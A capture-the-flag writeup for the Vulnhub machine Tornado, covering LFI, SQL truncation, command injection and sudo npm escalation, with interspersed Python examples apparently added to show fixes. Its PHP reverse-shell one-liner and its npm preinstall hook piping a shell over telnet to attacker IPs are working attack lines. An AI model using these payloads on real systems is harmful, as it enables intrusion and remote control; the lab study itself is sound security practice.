n0t0d4y.medium.com

IA: Tornado Vulnhub Writeup

N0t0d4y

Difficulty: Medium

NMAP:

Nice, ports 22 and 80 are open; let's browse.

Nothing here; enumerate more, and brute-force directories!

DIRSEARCH:

We found the directory /bluesky, but nothing interesting here! Enumerate again!

I just switched to gobuster, simply to use another tool :)

We found something interesting: /signup.php and /login.php. So let's sign up with random credentials!

We are in!

Now go to /login.php and log in with your credentials!

LFI? YES! But I found something else interesting, a "contact" feature. Just look:

So now let’s go for LFI!

Local File Inclusion:

It is different from the usual LFI; here I had to understand what it meant, because when I opened the source code, I found this.

But the classic ../../../../etc/passwd doesn't work! So I tried another method, and it really works! It is just a different alias.

~tornado/imp.txt was the LFI! Let's go.

Now we have some emails! But if we go to signup.php we notice that they are actually all registered. Here I got stuck, until I found a vulnerability thanks to Inspect Element.

SQL Truncation Attack:

If we go to /signup.php and inspect the element, we find something strange.

Maximum length "13"? It seemed strange, so I searched and found the SQL truncation attack. We can get in by changing the email field's maxlength, entering one of the emails we found with the LFI and appending our own email, the one we already registered before (in this case jin@jin.com). The system thinks that I am registering my own account, but in reality it is not: the stored value is cut down to the victim's email, so we will be able to log in as all the other users!

Change it to 33 or whatever you want! Now we need to find the user that can use "contact", and I found it!

Adding the target email with ours at the end, plus our own credentials, the system thinks that I am registering myself, while in reality it will let me in as jacob!

Now log in as jacob at /login.php, and finally we have "contact" unlocked!
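To make the truncation trick above concrete, here is an added Python simulation of the signup/login logic (my own example, not code from the Tornado box or from this writeup). It assumes a 13-character email column, matching the maxlength seen in the form, and emulates MySQL's non-strict truncation in front of SQLite, which never truncates on its own. The emails and passwords are constructed; the victim address is exactly 13 characters so the appended attacker address is what gets cut off. The hardened class shows the two server-side fixes: validate the length yourself instead of trusting the HTML attribute, and let a UNIQUE constraint be the real duplicate check.

```python
import sqlite3

# Assumed column width, taken from the maxlength="13" the page found in the signup form.
EMAIL_COLUMN_WIDTH = 13


def mysql_nonstrict_store(value: str) -> str:
    """Emulate MySQL running without STRICT_TRANS_TABLES: a value longer than the
    column is silently cut to the column width. SQLite does not do this, so the
    simulation truncates right before the INSERT."""
    return value[:EMAIL_COLUMN_WIDTH]


class VulnerableSignup:
    """Duplicate check on the raw input, no UNIQUE constraint, truncation on store."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        # Passwords stay plaintext only to keep the simulation short; hash them in real code.
        self.db.execute("CREATE TABLE users (email TEXT NOT NULL, password TEXT NOT NULL)")

    def register(self, email: str, password: str) -> bool:
        # The check compares the full, untruncated input ...
        if self.db.execute("SELECT 1 FROM users WHERE email = ?", (email,)).fetchone():
            return False  # "already registered"
        # ... but what lands in the table is the truncated value.
        self.db.execute("INSERT INTO users VALUES (?, ?)",
                        (mysql_nonstrict_store(email), password))
        return True

    def login(self, email: str, password: str):
        row = self.db.execute("SELECT email FROM users WHERE email = ? AND password = ?",
                              (email, password)).fetchone()
        return row[0] if row else None


class HardenedSignup:
    """Server-side length check plus a UNIQUE constraint as the authoritative duplicate check."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users (email TEXT NOT NULL UNIQUE, password TEXT NOT NULL)")

    def register(self, email: str, password: str) -> bool:
        if len(email) > EMAIL_COLUMN_WIDTH:
            return False  # reject instead of letting the database truncate
        try:
            self.db.execute("INSERT INTO users VALUES (?, ?)", (email, password))
        except sqlite3.IntegrityError:
            return False  # duplicate caught by the constraint, not by a racy SELECT
        return True

    def login(self, email: str, password: str):
        row = self.db.execute("SELECT email FROM users WHERE email = ? AND password = ?",
                              (email, password)).fetchone()
        return row[0] if row else None


if __name__ == "__main__":
    victim, attacker = "jacob@tor.com", "jin@jin.com"  # constructed addresses
    v = VulnerableSignup()
    v.register(victim, "jacobs-secret")
    print("second signup with padded email accepted:", v.register(victim + attacker, "attacker-pw"))
    print("login as victim with attacker password  :", v.login(victim, "attacker-pw"))
    h = HardenedSignup()
    h.register(victim, "jacobs-secret")
    print("hardened accepts padded email           :", h.register(victim + attacker, "attacker-pw"))
```

Note that the hardened version also drops the SELECT-then-INSERT pattern: even with correct length checks, a duplicate check done in application code can race, whereas the constraint cannot.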

Command Injection:

Now we can try to write our payload to obtain a reverse shell! I tried this payload:

php -r '$sock=fsockopen("192.168.1.2",4545);exec("/bin/sh -i <&3 >&3 2>&3");'

and we are IN!
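The "contact" feature works because a form field ends up inside a shell command string. As an added illustration (mine, not code from the box), here is the vulnerable pattern next to two fixes in Python: passing the field as a single argv element so no shell parses it, and validating it against an allowlist first. The probe string is constructed and harmless; it only appends a second echo.

```python
import re
import subprocess

# Allowlist for a contact-form field: letters, digits, spaces and a little punctuation.
# Assumption: the form never legitimately needs shell metacharacters.
SAFE_FIELD_RE = re.compile(r"^[A-Za-z0-9 @._-]{1,64}$")


def contact_vulnerable(name: str) -> str:
    """The bug class: the field is interpolated into a command string and handed to
    /bin/sh, so a ';' in the input starts a second command."""
    result = subprocess.run(f"echo Hello {name}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def contact_no_shell(name: str) -> str:
    """Same action with an argv list and no shell: the whole field becomes one
    argument to echo and cannot start a new command, even with no validation."""
    result = subprocess.run(["echo", "Hello", name],
                            capture_output=True, text=True)
    return result.stdout


def contact_hardened(name: str) -> str:
    """Defence in depth: allowlist the input, then use the argv form."""
    if not SAFE_FIELD_RE.fullmatch(name):
        raise ValueError("contact field contains characters outside the allowlist")
    return contact_no_shell(name)


if __name__ == "__main__":
    probe = "Bob; echo INJECTED"  # constructed input, not a real submission
    print("vulnerable:", repr(contact_vulnerable(probe)))   # two lines: the second echo ran
    print("no shell:  ", repr(contact_no_shell(probe)))     # one line, probe printed literally
    try:
        contact_hardened(probe)
    except ValueError as exc:
        print("hardened:  ", exc)
```

The argv form alone already stops the injection; the allowlist is there so that unexpected input is rejected loudly instead of being passed along to whatever the real handler does with it.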

Horizontal Privilege Escalation:

Type sudo -l

Now go to /tmp and create a folder "jin" (mkdir jin)! Go to your own shell and create a package.json file with this code:

{
  "name": "jin",
  "version": "1.0.0",
  "description": "follow jin on medium and twitter",
  "main": "index.js",
  "scripts": {
    "preinstall": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 192.168.1.110 9002 > /tmp/f"
  }
}

Now transfer this file into /tmp: in your shell run python -m http.server 8000, then fetch the file with wget!

Now mv package.json jin

and chmod +s jin/

Listen on port 9002 and type:

sudo -u catchme /usr/bin/npm i /tmp/jin --unsafe
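The escalation works because npm runs the package's lifecycle hooks (preinstall and friends) as whoever invokes the install, so a sudo rule for npm is effectively a shell as that user. As an added example (mine, not part of this writeup), here is a small Python auditor that pulls the install-time hooks out of a package.json and flags ones that look like shell payloads. The sample package.json is constructed with the same shape as the one above but a harmless hook; the list of suspicious substrings is my own heuristic, not an npm feature.

```python
import json

# npm runs these hooks automatically during "npm install" / "npm i"; any command in
# them executes with the privileges of the user doing the install.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "prepublish", "preuninstall", "postuninstall")

# Heuristic substrings that usually mean "arbitrary shell"; worth a human look in review.
SUSPICIOUS = ("/bin/sh", "bash", "sh -c", "|", ";", ">", "mkfifo",
              "curl", "wget", "nc ", "telnet", "python")

# Constructed package.json: same structure as the page's, with a benign hook.
SAMPLE_PACKAGE_JSON = """{
  "name": "jin",
  "version": "1.0.0",
  "main": "index.js",
  "scripts": {
    "preinstall": "sh -c 'id > /tmp/who-ran-me'",
    "test": "node test.js"
  }
}"""


def lifecycle_scripts(package_json_text: str) -> list:
    """Return (hook, command) pairs for every install-time hook defined in package.json."""
    pkg = json.loads(package_json_text)
    scripts = pkg.get("scripts", {})
    return [(hook, scripts[hook]) for hook in LIFECYCLE_HOOKS if hook in scripts]


def flag_suspicious(command: str) -> list:
    """Return the suspicious substrings present in one script command, in SUSPICIOUS order."""
    return [token for token in SUSPICIOUS if token in command]


def audit(package_json_text: str) -> list:
    """Return (hook, command, flags) for each lifecycle hook that trips the heuristic."""
    findings = []
    for hook, command in lifecycle_scripts(package_json_text):
        flags = flag_suspicious(command)
        if flags:
            findings.append((hook, command, flags))
    return findings


if __name__ == "__main__":
    for hook, command, flags in audit(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {command!r} -> flagged for {flags}")
```

On the defensive side, `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) prevents these hooks from running at all, and a sudoers entry that lets one user run npm as another should be treated the same as granting that user a shell.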

Final Step!

There is the flag user.txt; take it! After that there is a Python script, enc.py,

with an encrypted hash, similar to ROT13. I just went to this link: https://www.boxentriq.com/code-breaking/caesar-cipher

and pasted the encrypted hash!

Press Auto Solve! And I got this!

But this is not actually the password, so I have not solved it yet! If you think about it for a moment, though, you just need to understand what the password is! Just read it and formulate it well.

WE ARE ROOT!

I hope this is useful! Follow me on Twitter too: @0xJin

-0xJin